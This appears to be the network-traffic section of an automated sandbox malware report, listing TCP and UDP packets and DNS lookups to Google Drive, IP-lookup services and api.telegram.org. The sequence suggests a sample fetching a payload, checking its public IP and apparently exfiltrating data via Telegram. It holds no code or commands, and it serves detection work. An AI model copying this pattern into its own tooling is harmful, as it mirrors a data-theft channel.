Oct 8, 2024 03:32:37.887645960 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.887702942 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.888884068 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.888936996 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.891433001 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.891521931 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.891536951 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.891591072 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.891629934 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.891685963 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.892640114 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.892703056 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.894321918 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.894386053 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.894448996 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.894505024 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.894841909 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.894898891 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.896193981 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.896286964 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.898243904 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.898750067 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.898818016 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.898829937 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.901062965 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.901073933 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.901859999 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.901942968 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.901953936 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.904090881 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.904158115 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.904169083 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.904222012 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.904232025 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.905056953 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.905066967 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.905122042 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.905215025 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.905271053 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.906203985 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.906256914 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.906368971 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.906423092 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.907783031 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.907843113 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.908411026 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.908798933 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.909149885 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.910640001 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.910732985 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.910743952 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.912024975 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.912118912 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.912130117 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.912234068 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.912252903 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.912267923 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.912305117 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.912323952 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.913608074 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.915045977 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.915115118 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.915127039 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.916867971 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.916965961 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.916975975 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.916990042 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.917016983 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.917033911 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.919209003 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.921061039 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.921072006 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.921127081 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.921343088 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.921401978 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.921444893 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.921498060 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.921802998 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.921859980 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.921897888 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.921957016 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.925489902 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.925667048 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.925757885 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.928957939 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.928988934 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.929011106 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.929054022 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:38.117182970 CEST	49864	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:38.122212887 CEST	80	49864	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:38.122312069 CEST	49864	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:38.122438908 CEST	49864	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:38.127343893 CEST	80	49864	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:38.713556051 CEST	80	49864	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:38.718175888 CEST	49864	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:38.723107100 CEST	80	49864	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:40.103478909 CEST	80	49864	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:40.146298885 CEST	49864	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:40.383177042 CEST	49880	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:40.383253098 CEST	443	49880	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:40.383425951 CEST	49880	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:40.384634018 CEST	49880	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:40.384665966 CEST	443	49880	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:40.853487968 CEST	443	49880	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:40.853631020 CEST	49880	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:40.857547998 CEST	49880	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:40.857563019 CEST	443	49880	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:40.858012915 CEST	443	49880	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:40.861908913 CEST	49880	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:40.903412104 CEST	443	49880	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:40.997247934 CEST	443	49880	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:40.997469902 CEST	443	49880	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:40.997634888 CEST	49880	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:41.002687931 CEST	49880	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:41.017138958 CEST	49864	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:41.023277998 CEST	80	49864	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:41.195625067 CEST	80	49864	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:41.197510004 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:41.197526932 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:41.197630882 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:41.197953939 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:41.197959900 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:41.240067959 CEST	49864	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:41.669749975 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:41.671217918 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:41.671245098 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:41.815740108 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:41.815947056 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:41.816009045 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:41.816458941 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:41.819709063 CEST	49864	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:41.821028948 CEST	49892	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:41.824806929 CEST	80	49864	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:41.824872971 CEST	49864	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:41.825851917 CEST	80	49892	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:41.825934887 CEST	49892	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:41.826021910 CEST	49892	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:41.831625938 CEST	80	49892	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:43.414864063 CEST	80	49892	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:43.416203976 CEST	49903	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:43.416233063 CEST	443	49903	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:43.416321039 CEST	49903	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:43.416554928 CEST	49903	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:43.416563034 CEST	443	49903	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:43.458900928 CEST	49892	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:43.882762909 CEST	443	49903	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:43.884653091 CEST	49903	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:43.884680033 CEST	443	49903	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:44.011183977 CEST	443	49903	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:44.011476994 CEST	443	49903	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:44.011560917 CEST	49903	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:44.012022018 CEST	49903	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:44.015827894 CEST	49909	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:44.020798922 CEST	80	49909	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:44.021061897 CEST	49909	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:44.021061897 CEST	49909	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:44.026067019 CEST	80	49909	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:44.628424883 CEST	80	49909	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:44.632309914 CEST	49912	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:44.632354021 CEST	443	49912	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:44.632505894 CEST	49912	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:44.632600069 CEST	49912	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:44.632608891 CEST	443	49912	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:44.677536964 CEST	49909	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:45.095315933 CEST	443	49912	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:45.096714020 CEST	49912	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:45.096745014 CEST	443	49912	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:45.247262001 CEST	443	49912	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:45.247546911 CEST	443	49912	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:45.247620106 CEST	49912	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:45.247900009 CEST	49912	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:45.251133919 CEST	49909	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:45.252193928 CEST	49916	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:45.256308079 CEST	80	49909	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:45.256402969 CEST	49909	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:45.257040977 CEST	80	49916	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:45.257118940 CEST	49916	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:45.257210016 CEST	49916	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:45.261955023 CEST	80	49916	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:45.817893028 CEST	80	49916	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:45.819480896 CEST	49922	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:45.819542885 CEST	443	49922	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:45.821211100 CEST	49922	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:45.825723886 CEST	49922	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:45.825771093 CEST	443	49922	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:45.865060091 CEST	49916	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:46.293072939 CEST	443	49922	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:46.294542074 CEST	49922	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:46.294574976 CEST	443	49922	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:46.415699959 CEST	443	49922	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:46.415920973 CEST	443	49922	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:46.415982008 CEST	49922	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:46.416230917 CEST	49922	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:46.419275045 CEST	49916	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:46.420192003 CEST	49927	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:46.424612045 CEST	80	49916	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:46.424702883 CEST	49916	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:46.425028086 CEST	80	49927	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:46.425205946 CEST	49927	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:46.425205946 CEST	49927	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:46.430149078 CEST	80	49927	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:47.008312941 CEST	80	49927	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:47.012408018 CEST	49932	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:47.012494087 CEST	443	49932	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:47.012592077 CEST	49932	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:47.012772083 CEST	49932	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:47.012798071 CEST	443	49932	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:47.068161964 CEST	49927	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:47.474946022 CEST	443	49932	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:47.489715099 CEST	49932	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:47.489816904 CEST	443	49932	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:47.604927063 CEST	443	49932	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:47.605173111 CEST	443	49932	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:47.609081030 CEST	49932	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:47.609314919 CEST	49932	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:47.612327099 CEST	49927	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:47.612749100 CEST	49936	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:47.617626905 CEST	80	49927	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:47.617733002 CEST	80	49936	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:47.617809057 CEST	49927	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:47.617834091 CEST	49936	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:47.617928028 CEST	49936	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:47.622786999 CEST	80	49936	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:48.179914951 CEST	80	49936	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:48.181097031 CEST	49941	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:48.181130886 CEST	443	49941	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:48.181309938 CEST	49941	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:48.181479931 CEST	49941	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:48.181484938 CEST	443	49941	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:48.224440098 CEST	49936	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:48.655277014 CEST	443	49941	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:48.657286882 CEST	49941	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:48.657349110 CEST	443	49941	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:48.815785885 CEST	443	49941	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:48.816040993 CEST	443	49941	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:48.816128969 CEST	49941	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:48.816380024 CEST	49941	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:48.819920063 CEST	49936	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:48.820779085 CEST	49945	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:48.825418949 CEST	80	49936	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:48.825488091 CEST	49936	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:48.825793982 CEST	80	49945	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:48.825903893 CEST	49945	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:48.825970888 CEST	49945	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:48.830859900 CEST	80	49945	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:49.386369944 CEST	80	49945	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:49.387603998 CEST	49951	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:49.387672901 CEST	443	49951	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:49.387769938 CEST	49951	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:49.387973070 CEST	49951	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:49.387990952 CEST	443	49951	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:49.427516937 CEST	49945	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:49.861855030 CEST	443	49951	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:49.910734892 CEST	49951	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:49.910783052 CEST	443	49951	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:50.020678043 CEST	443	49951	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:50.020982027 CEST	443	49951	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:50.021063089 CEST	49951	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:50.035044909 CEST	49951	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:50.174798012 CEST	49945	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:50.175304890 CEST	49956	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:50.180273056 CEST	80	49945	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:50.180305004 CEST	80	49956	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:50.180341005 CEST	49945	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:50.180377960 CEST	49956	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:50.182240963 CEST	49956	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:50.187057018 CEST	80	49956	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:50.928838968 CEST	80	49956	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:50.930094957 CEST	49961	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:50.930138111 CEST	443	49961	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:50.930213928 CEST	49961	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:50.930387020 CEST	49961	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:50.930392981 CEST	443	49961	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:50.974648952 CEST	49956	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:51.394473076 CEST	443	49961	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:51.396492004 CEST	49961	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:51.396513939 CEST	443	49961	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:51.531846046 CEST	443	49961	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:51.532084942 CEST	443	49961	188.114.96.3	192.168.2.5
Oct 8, 2024 03:32:51.532167912 CEST	49961	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:51.532576084 CEST	49961	443	192.168.2.5	188.114.96.3
Oct 8, 2024 03:32:51.576503992 CEST	49956	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:51.581880093 CEST	80	49956	158.101.44.242	192.168.2.5
Oct 8, 2024 03:32:51.583456993 CEST	49956	80	192.168.2.5	158.101.44.242
Oct 8, 2024 03:32:51.584228039 CEST	49966	443	192.168.2.5	149.154.167.220
Oct 8, 2024 03:32:51.584326982 CEST	443	49966	149.154.167.220	192.168.2.5
Oct 8, 2024 03:32:51.584405899 CEST	49966	443	192.168.2.5	149.154.167.220
Oct 8, 2024 03:32:51.584714890 CEST	49966	443	192.168.2.5	149.154.167.220
Oct 8, 2024 03:32:51.584736109 CEST	443	49966	149.154.167.220	192.168.2.5
Oct 8, 2024 03:32:52.220655918 CEST	443	49966	149.154.167.220	192.168.2.5
Oct 8, 2024 03:32:52.220818043 CEST	49966	443	192.168.2.5	149.154.167.220
Oct 8, 2024 03:32:52.222754002 CEST	49966	443	192.168.2.5	149.154.167.220
Oct 8, 2024 03:32:52.222790003 CEST	443	49966	149.154.167.220	192.168.2.5
Oct 8, 2024 03:32:52.223134041 CEST	443	49966	149.154.167.220	192.168.2.5
Oct 8, 2024 03:32:52.224322081 CEST	49966	443	192.168.2.5	149.154.167.220
Oct 8, 2024 03:32:52.271455050 CEST	443	49966	149.154.167.220	192.168.2.5
Oct 8, 2024 03:32:52.467762947 CEST	443	49966	149.154.167.220	192.168.2.5
Oct 8, 2024 03:32:52.467935085 CEST	443	49966	149.154.167.220	192.168.2.5
Oct 8, 2024 03:32:52.467998981 CEST	49966	443	192.168.2.5	149.154.167.220
Oct 8, 2024 03:32:52.470046043 CEST	49966	443	192.168.2.5	149.154.167.220
Oct 8, 2024 03:32:58.314764977 CEST	49892	80	192.168.2.5	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 03:32:33.046673059 CEST	55264	53	192.168.2.5	1.1.1.1
Oct 8, 2024 03:32:33.054105997 CEST	53	55264	1.1.1.1	192.168.2.5
Oct 8, 2024 03:32:34.105588913 CEST	50971	53	192.168.2.5	1.1.1.1
Oct 8, 2024 03:32:34.113059044 CEST	53	50971	1.1.1.1	192.168.2.5
Oct 8, 2024 03:32:38.106081963 CEST	51457	53	192.168.2.5	1.1.1.1
Oct 8, 2024 03:32:38.113631010 CEST	53	51457	1.1.1.1	192.168.2.5
Oct 8, 2024 03:32:40.375366926 CEST	49816	53	192.168.2.5	1.1.1.1
Oct 8, 2024 03:32:40.382668018 CEST	53	49816	1.1.1.1	192.168.2.5
Oct 8, 2024 03:32:51.576991081 CEST	55931	53	192.168.2.5	1.1.1.1
Oct 8, 2024 03:32:51.583779097 CEST	53	55931	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 03:32:33.046673059 CEST	192.168.2.5	1.1.1.1	0x9529	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:34.105588913 CEST	192.168.2.5	1.1.1.1	0x4712	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:38.106081963 CEST	192.168.2.5	1.1.1.1	0x1dc1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:40.375366926 CEST	192.168.2.5	1.1.1.1	0xf2ad	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:51.576991081 CEST	192.168.2.5	1.1.1.1	0x70ea	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 03:32:33.054105997 CEST	1.1.1.1	192.168.2.5	0x9529	No error (0)	drive.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:34.113059044 CEST	1.1.1.1	192.168.2.5	0x4712	No error (0)	drive.usercontent.google.com		216.58.206.65	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:38.113631010 CEST	1.1.1.1	192.168.2.5	0x1dc1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 03:32:38.113631010 CEST	1.1.1.1	192.168.2.5	0x1dc1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
